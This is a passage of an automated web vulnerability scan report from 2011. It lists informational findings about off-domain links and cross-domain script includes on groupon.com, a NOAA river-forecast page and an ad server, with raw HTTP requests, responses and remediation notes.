<div class="UIImageBlock clearfix pas fbRecommendation RES_7441582ca3e36f4f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/World/Latest-News-Wires/2011/0503/Bin-Laden-wives-found-in-compound-one-used-as-human-shield" title="Bin Laden wives found in compound, one used as human shield" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0502_wives/10046189-1-eng-US/0502_Wives_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/World/Latest-News-Wires/2011/0503/Bin-Laden-wives-found-in-compound-one-used-as-human-shield" target="_top">Bin Laden wives found in compound, one used as human shield</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5cfafb05d881733c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Politics/2011/0505/9-11-families-to-Obama-Thank-you-for-doing-what-you-promised" title="9/11 families to Obama: &#039;Thank you for doing what you promised&#039;" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-awreath-obama-ground-zero/10061833-1-eng-US/0505-AWREATH-Obama-Ground-Zero_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/USA/Politics/2011/0505/9-11-families-to-Obama-Thank-you-for-doing-what-you-promised" target="_top">9/11 families to Obama: &#039;Thank you for doing what you promised&#039;</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4a533d38209fb22a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/World/Asia-South-Central/2011/0502/Osama-bin-Laden-killed-near-Pakistan-s-West-Point.-Was-he-really-hidden" title="Osama bin Laden killed near Pakistan&#039;s West Point. Was he really hidden?" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0502-world-ohiding/10041921-1-eng-US/0502-world-ohiding_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/World/Asia-South-Central/2011/0502/Osama-bin-Laden-killed-near-Pakistan-s-West-Point.-Was-he-really-hidden" target="_top">Osama bin Laden killed near Pakistan&#039;s West Point. Was he really hidden?</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_31c7feb25cdc8884"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Science/2011/0505/In-tonight-s-meteor-shower-watch-falling-debris-from-Halley-s-Comet" title="In tonight&#039;s meteor shower, watch falling debris from Halley&#039;s Comet" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0505-meteor-shower/10060092-2-eng-US/0505-meteor-shower_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Science/2011/0505/In-tonight-s-meteor-shower-watch-falling-debris-from-Halley-s-Comet" target="_top">In tonight&#039;s meteor shower, watch falling debris from Halley&#039;s Comet</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_634e0623b8413b81"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Business/Robert-Reich-s-Blog/2011/0429/The-oil-company-gusher" title="The oil company gusher" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0429-exxon/10032426-1-eng-US/0429-exxon_thumbnail_90.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.csmonitor.com/Business/Robert-Reich-s-Blog/2011/0429/The-oil-company-gusher" target="_top">The oil company gusher</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

17.33. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<head>
<link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' />
<script type="text/javascript">
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css?9SaOIwIc" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&amp;script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&amp;script=0" width="1" /></div>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</form>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps_beneath disabled_on_submit" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_small.gif?xK4VlDLG" />
</div>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

17.34. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /subscriptions/new?division_p=dallas HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; visited=visit_1; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:19 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:19 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:19 GMT; HttpOnly
Status: 200
ETag: "ba29897db2cb6994cc7355c313e7987f"
X-Runtime: 78
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<head>
<link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' />
<script type="text/javascript">
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps7.css?yCo78ZCv" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&amp;script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&amp;script=0" width="1" /></div>
...[SNIP]...
</h1>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/headline_3.gif?Ps-G-CLd" />
<div class='city_name'>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?kWgEDV5U" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?1nuXIT24" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/dev/jquery.validate.js?QDTFjlfJ" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?-rDwJEm-" type="text/javascript"></script>
...[SNIP]...

17.35. http://www.srh.noaa.gov/lmrfc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lmrfc/?n=lmrfc-mississippiandohioriverforecast HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 17853
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8" />
<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" /><title>
...[SNIP]...
<div class="aligncenter"><a href="http://www.weather.gov/" class="wxlink">weather.gov</a>
...[SNIP]...
<li><a href="http://www.weather.gov/pa/">News</a></li>
<li><a href="http://weather.gov/organization.php">Organization</a>
...[SNIP]...
<li>
           <a href="http://www.weather.gov/rss/"><img src="/images/xml.gif" alt="RSS Feeds" title="RSS Feeds" width="36" height="14" class="img" />
...[SNIP]...
<li><a href="http://water.weather.gov/precip" title="Observed Precip">Observed Precip</a>
...[SNIP]...
<li><a href="http://radar.weather.gov/Conus/index.php" title="Radar">Radar</a>
...[SNIP]...
<li><a href="http://www.drought.gov/portal/server.pt" title="Nat'l Drought Info">Nat'l Drought Info</a>
...[SNIP]...
<font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://water.weather.gov/ahps2/river.php?wfo=pah&amp;wfoid=18785&amp;riverid=203833&amp;view=1,1,1,1,1,1,1,1&amp;toggles=10,7,8,2,9,15,6&amp;pt[]=144108&amp;pt[]=141463&amp;pt[]=141839&amp;pt[]=143934&amp;pt[]=141618&amp;pt[]=146423&amp;pt[]=143366&amp;pt[]=142172&amp;pt[]=141493&amp;pt[]=142940&amp;pt[]=144619&amp;pt[]=144798&amp;pt[]=144609&amp;pt[]=141308&amp;pt[]=144449&amp;pt[]=143828&amp;pt[]=142711&amp;allpoints=143846,142736,143816,143998,145144,142659,142234,145887,144081,142375,143866,141506,142962,143885,143323,144201,144542,142873,143260,143099,142560,144186,143177,142054,143945,144055,141370,143630,141931,142812,141676,142534,144568,143535,144589,143030,144031,143079,144282,141445,141722,141383,143445,143646,143787,143574,143545,142773,141629,144517,142500,143196,142105,142509,142418,144108,141463,141839,143934,141618,146423,143366,142172,141493,142940,144619,144798,144609,141308,144449,143828,142711&amp;data[]=hydrograph&amp;submit=Make+my+River+Page!">Mississippi River Hydrographs</a>
...[SNIP]...
<font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://water.weather.gov/ahps2/river.php?wfo=lmk&amp;wfoid=18699&amp;riverid=204624&amp;view=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1&amp;toggles=&amp;pt%5B%5D=143995&amp;pt%5B%5D=143371&amp;pt%5B%5D=141372&amp;pt%5B%5D=141907&amp;pt%5B%5D=143683&amp;allpoints=141893%2C143063%2C144287%2C142160%2C145137%2C143614%2C141268%2C144395%2C143843%2C142481%2C143607%2C145086%2C142497%2C141266%2C145247%2C143025%2C142896%2C144670%2C145264%2C144035%2C143875%2C143847%2C142264%2C143602%2C144126%2C146318%2C141608%2C144451%2C144523%2C144877%2C142935%2C142195%2C146116%2C143151%2C142437%2C142855%2C142537%2C142598%2C143203%2C143868%2C144676%2C143954%2C143995%2C143371%2C141372%2C141907%2C143683&amp;data%5B%5D=hydrograph&amp;submit=Make%2Bmy%2BRiver%2BPage%21">Ohio River Hydrographs</a>
...[SNIP]...
<li><a href="http://www.weather.gov/disclaimer.php">Disclaimer</a>
...[SNIP]...
<li><a href="http://www.weather.gov/credits.php">Credits</a></li>
<li><a href="http://www.weather.gov/glossary/">Glossary</a>
...[SNIP]...
<li><a href="http://www.weather.gov/privacy.php">Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.weather.gov/admin.php">About Us</a></li>
<li><a href="http://www.weather.gov/careers.php">Career Opportunities</a>
...[SNIP]...

18. Cross-domain script include  previous  next
There are 51 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=27888134820386770&clkurl=http://ib.adnxs.com/click/AQAAAAAA_D8AAAAAAAD8PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQJ41jpUnrNkrSsYda6b2ziXpCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04A9gUBAgUCAAQAAAAAbxbN4QAAAAA./cnd=!7hJ17Ai_kAMQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBXt6i6QnITcO4EKXvlQfzjoStCNfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gC1g3AAgTIAoXSzwrgAgDqAg4zMDB4MjUwQl9Nb25leagDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAGABunEhfTFkNaJMg%26num%3D1%26sig%3DAGiWqtzXujmj6x9ljlxi_jlsMLM-st1i2A%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUlVjb46xel_B1pRvtUstYmBf.mMUDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWBLIKCADRapOK

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUA0JKRlc1ZV6E31_Bd0WGv_ToRnQDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDdnBCpmCLzFKAikOHcy8gMpBgN.BiYmRmZ.FkZWRjZGdkYORk5GLkZuRh5GXkY.sBKWTEYRoMqlBWB9CmYQwRAmEUZRoLD8Lh7cWhe7g60Ep98vILcwMAAAkcyWNQ--; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:36:14 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3920
Date: Mon, 09 May 2011 15:36:13 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1987910106?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUwTUL4C0hX73GwRuwlgMiXZ7PuHNnZW8sdXNhLHQsMTMwNDk1NTM3NDA2OCxjLDI4OTY2OSxwYyw2OTExMixhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FRQUFBQUFBX0Q4QUFBQUFBQUQ4UHdBQUFBQUFBQXhBQUFBQUFBQUFERUFBQUFBQUFBQU1RSjQxanBVbnJOa3JTc1lkYTZiMnppWHBDY2hOQUFBQUFDNGhBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0IzQzA0QTlnVUJBZ1VDQUFRQUFBQUFieGJONFFBQUFBQS4vY25kPSE3aEoxN0FpX2tBTVF4OGtLR0FBZzBjY0JLRTR4QUFBQUFBQUFERUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUGNXWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNzL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CWHQ2aTZRbklUY080RUtYdmxRZnpqb1N0Q05mcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQzFnM0FBZ1RJQW9YU3p3cmdBZ0RxQWc0ek1EQjRNalV3UWw5TmIyNWxlYWdEQWVnRGEtZ0Rrd1hvQTVnRDZBT0xDZWdEakFuMUF3SUVBRVQxQXlBQUFBRGdCQUdBQnVuRWhmVEZrTmFKTWcmbnVtPTEmc2lnPUFHaVdxdHpYdWptajZ4OWxqbHhpX2psc01MTS1zdDFpMkEmY2xpZW50PWNhLXB1Yi02NzQzNjIyNTI1MjAyNTcyJmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1158518083" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

18.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

